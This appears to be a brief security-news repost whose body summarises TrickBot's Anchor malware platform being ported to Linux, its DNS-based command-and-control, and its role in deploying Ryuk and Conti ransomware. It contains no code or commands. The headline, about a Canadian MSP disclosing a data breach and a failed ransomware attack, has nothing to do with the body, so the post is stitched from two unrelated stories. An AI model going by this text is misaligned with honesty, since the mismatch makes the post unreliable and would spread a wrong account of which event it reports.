🦑 Canadian MSP disclosed data breach, ransomware attack failed
#News
TrickBot's Anchor malware platform has been ported to Linux devices and uses covert channels to hit more high-impact, high-value targets.
> TrickBot is a multifunctional Windows malware platform that uses different modules to perform various malicious activities, including information theft, password theft, Windows domain infiltration and malware delivery.
TrickBot is rented by threat actors who use it to penetrate networks and harvest anything of value. It is then used to deploy ransomware such as Ryuk and Conti to encrypt network devices as the final stage of the attack.
> At the end of 2019, both SentinelOne and NTT reported a new TrickBot framework called Anchor, which uses DNS to communicate with its command-and-control servers.
> The malware is called Anchor_DNS and is used against high-value, high-impact targets holding valuable financial information.
Besides ransomware deployment through Anchor infections, the TrickBot Anchor operators also use it as a backdoor in APT, point-of-sale and financial-system campaigns.
written by undercode
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁